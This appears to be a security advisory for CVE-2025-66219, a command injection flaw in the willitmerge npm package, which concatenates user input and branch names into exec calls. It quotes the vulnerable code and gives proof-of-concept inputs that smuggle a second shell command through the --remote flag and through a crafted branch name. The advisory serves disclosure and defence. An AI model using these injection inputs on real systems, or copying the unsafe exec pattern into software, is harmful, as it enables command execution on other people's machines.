CVE-2025-66219
willitmerge has a Command Injection vulnerability
Description
willitmerge describes itself as a command line tool to check if pull requests are mergeable. There is a Command Injection vulnerability in the package (the affected version range, `<= 0.2.1`, is listed under affected packages below).

Resources:

* Project's GitHub source code: https://github.com/shama/willitmerge/
* Project's npm package: https://www.npmjs.com/package/willitmerge

## Background on exploitation

Reporting a Command Injection vulnerability in the `willitmerge` npm package. The vulnerability arises because the package uses the insecure child process execution API (`exec`) and concatenates user input into the shell command string, whether that input is provided through a command-line flag or is under user control in the target repository.

## Exploit

### POC 1

1. Install `willitmerge`
2. Run it with the following command:

```sh
willitmerge --verbose --remote "https://github.com/lirantal/npq.git; touch /tmp/hel"
```

3. Confirm the file `/tmp/hel` is created on disk

### GitHub-sourced attack vector

[Lines 189-197](https://github.com/shama/willitmerge/blob/2fe91d05191fb05ac6da685828d109a3a5885028/lib/willitmerge.js#L189-L197) in `lib/willitmerge.js` pass user input controlled by repository collaborators into the git command:

```js
// branch, gitUrl, iss.base.ref and iss.head.ref are derived from the pull
// request and repository; options.remote comes from the --remote flag.
// Every value is concatenated into a string that is later run via exec().
var cmds = [
  'git checkout -b ' + branch + ' ' + that.options.remote + '/' + iss.base.ref,
  'git remote add ' + branch + ' ' + gitUrl,
  'git pull ' + branch + ' ' + iss.head.ref,
  'git reset --merge HEAD',
  'git checkout ' + origBranch,
  'git branch -D ' + branch,
  'git remote rm ' + branch
];
```

Users creating malicious branch names such as `;{echo,hello,world}>/tmp/c` can therefore inject shell commands, since the branch name is concatenated into the string run by `exec`.

This is a similar attack vector to that reported for the [pullit vulnerability](https://security.snyk.io/vuln/npm:pullit:20180214).

# Author

Liran Tal
How to fix CVE-2025-66219
No fixed version has been released yet. Consider removing the affected package, or refer to the upstream advice at the links below.
- No fixed version listed
Is CVE-2025-66219 being exploited?
Low: EPSS is 0.3%, and no widespread exploitation activity has been observed so far.
Affected packages (1)
- from 0, <= 0.2.1